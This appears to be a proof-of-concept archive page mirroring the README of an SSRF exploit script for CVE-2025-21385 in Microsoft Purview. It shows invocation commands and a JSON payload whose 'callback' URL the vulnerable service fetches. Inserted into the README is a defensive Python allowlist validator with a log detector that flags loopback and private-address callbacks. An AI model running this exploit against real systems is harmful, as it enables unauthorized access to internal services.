Associated vulnerability
Description
The SSRF vulnerability in Microsoft Purview
Introduction
# SSRF Exploit Script
This repository contains a script designed to perform an SSRF (Server-Side Request Forgery) exploit for testing and educational purposes. **Use this tool responsibly and only in environments where you have explicit permission.**
## Features
- Exploit SSRF vulnerabilities in target systems.
- Validate input URLs to avoid misuse.
- Easy-to-use CLI interface with clear error messages and help menu.
## Requirements
- `bash` (Unix shell)
- `jq` (JSON processor)
- `curl` (Command-line tool for HTTP requests)
## Usage
### Syntax
```bash
./script.sh --exploit <target_url> <purview_url>
```
### Options
| Option | Description |
|---------------------------|--------------------------------------------------------|
| `-h`, `--help` | Show the help menu. |
| `--exploit <tu> <pu>` | Perform the SSRF exploit with target and purview URLs. |
### Examples
#### Show Help Menu
```bash
./script.sh -h
```
Output:
```
Usage:
./script.sh --exploit <target_url> <purview_url>
Options:
-h, --help - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs
```
#### Perform SSRF Exploit
```bash
./script.sh --exploit http://example.com http://purview-url.com
```
Expected Output:
- If successful:
```
SSRF exploit successful! Data retrieved:
<response data>
```
- If unsuccessful:
```
SSRF exploit failed! HTTP code: <code>
```
## Script Workflow
1. The script parses the provided arguments.
2. Validates the provided URLs for correctness.
3. Sends an HTTP POST request with a JSON payload to the `purview_url`, attempting to exploit an SSRF vulnerability.
4. Prints the HTTP response or an error message based on the result.
## Example Workflow
### Input
```bash
./script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com
```
### Payload Sent
```json
{
"callback": "http://callback-url.com"
}
```
### Response Handling
The script saves the HTTP response code and body, and decides whether the exploit succeeded or failed from the status code.
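The workflow above turns on a single user-controlled value: the `callback` URL in the POST body, which the receiving service then fetches. The defensive counterpart is to validate that value server-side and to watch request logs for callbacks that fail validation. The following is an added example (not code from this script, and not Microsoft Purview's own handling of the parameter) showing an unvalidated acceptor beside a hardened allowlist check, plus a small detector run over constructed JSON request-log lines. The allowlisted hosts, the log format and the function names are assumptions made for illustration.

```python
import ipaddress
import json
from urllib.parse import urlparse

# Assumed operator-configured allowlist; real deployments would load this from config.
ALLOWED_CALLBACK_HOSTS = {"callbacks.example.com", "hooks.example.org"}
ALLOWED_SCHEMES = {"https"}


def vulnerable_accept_callback(url: str) -> str:
    """The pattern that makes SSRF possible: the client-supplied URL is used as-is."""
    return url


def check_callback(url: str) -> tuple[bool, str]:
    """Hardened acceptor: returns (ok, reason) for a client-supplied callback URL.

    Rejects anything that is not https, carries credentials, names an IP literal
    (so loopback, private, link-local and metadata ranges are never reachable),
    or is not on the host allowlist.
    """
    try:
        parts = urlparse(url)
    except ValueError:
        return False, "unparseable url"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    host = parts.hostname  # lowercased, IPv6 brackets stripped
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in url"
    try:
        ipaddress.ip_address(host)
    except ValueError:
        pass  # a hostname, checked against the allowlist below
    else:
        return False, "ip literal not allowed"
    if host not in ALLOWED_CALLBACK_HOSTS:
        return False, "host not on allowlist"
    return True, "ok"


# Constructed sample request log (one JSON record per line); not real traffic.
SAMPLE_LOG = [
    '{"src_ip":"203.0.113.10","method":"POST","path":"/api/scan","body":{"callback":"https://callbacks.example.com/done"}}',
    '{"src_ip":"203.0.113.11","method":"POST","path":"/api/scan","body":{"callback":"http://127.0.0.1:8080/admin"}}',
    '{"src_ip":"203.0.113.12","method":"POST","path":"/api/scan","body":{"callback":"https://10.0.0.5/internal"}}',
    '{"src_ip":"203.0.113.13","method":"POST","path":"/api/scan","body":{"callback":"https://collector.example.net/x"}}',
    '{"src_ip":"203.0.113.14","method":"GET","path":"/health"}',
    'not json at all',
]


def flag_suspicious_callbacks(log_lines):
    """Return (src_ip, callback, reason) for every logged callback that fails check_callback."""
    flagged = []
    for line in log_lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line; a real pipeline would count these
        body = rec.get("body")
        callback = body.get("callback") if isinstance(body, dict) else None
        if not isinstance(callback, str):
            continue
        ok, reason = check_callback(callback)
        if not ok:
            flagged.append((rec.get("src_ip", "?"), callback, reason))
    return flagged


if __name__ == "__main__":
    for src, cb, why in flag_suspicious_callbacks(SAMPLE_LOG):
        print(f"{src} -> {cb}: {why}")
```

The allowlist check is deliberately strict: rejecting every IP literal, rather than only private ranges, avoids having to enumerate special-purpose ranges, and refusing credentials in the URL closes the `user@host` confusion that some URL parsers fall for. The detector reuses the same function so that what the server rejects and what the SOC alerts on cannot drift apart.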
## Error Handling
- If invalid or missing arguments are detected, the script provides detailed instructions via the help menu.
- If URLs are malformed, an error message is displayed, and the execution stops.
## Development Notes
This script is for testing purposes only. Misuse of this script can lead to severe legal consequences. Ensure compliance with all applicable laws and ethical standards.
## Contribution
Feel free to contribute by creating pull requests or reporting issues.
## License
[GNU GPL v3](LICENSE)
---
### Disclaimer
**This tool is intended for educational purposes and authorized penetration testing only.** The author is not responsible for any misuse or damage caused by this tool.
File snapshot
```
[4.0K] /data/pocs/64b1d210d649a1c5df5c2a56f745e91ece7ebdda
├── [2.2K] CVE-2025-21385.sh
├── [ 34K] LICENSE
└── [2.8K] README.md
0 directories, 3 files
```
Notes
1. Accessing the original source is recommended.
2. If the source is no longer available or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request a local snapshot.
3. Shenlong has taken this snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.